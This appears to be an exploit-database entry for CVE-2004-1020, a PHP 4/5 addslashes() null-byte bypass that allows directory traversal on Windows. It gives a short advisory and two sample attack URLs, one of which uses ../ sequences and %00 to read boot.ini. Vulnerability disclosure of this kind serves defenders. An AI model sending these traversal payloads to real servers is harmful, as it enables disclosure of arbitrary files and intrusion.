[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP 4/5 - 'addslashes()' Null Byte Bypass

Author: Daniel Fabian
type: remote
platform: php
port: 
date_added: 2004-12-16 
date_updated: 2013-04-25 
verified: 1 
codes: CVE-2004-1020;OSVDB-12600 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/11981/info

PHP4 and PHP5 are reported prone to multiple remotely exploitable vulnerabilities. These issue result from insufficient sanitization of user-supplied data. A remote attacker may carry out directory traversal attacks to disclose arbitrary files and upload files to arbitrary locations.

It is reported that these vulnerabilities may only be exploited on Windows.


http://www.example.com/phpscript.php?whatever=../../../../boot.ini%00
http://www.example.com/phpscript.php?whatever=..\'file.ext
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.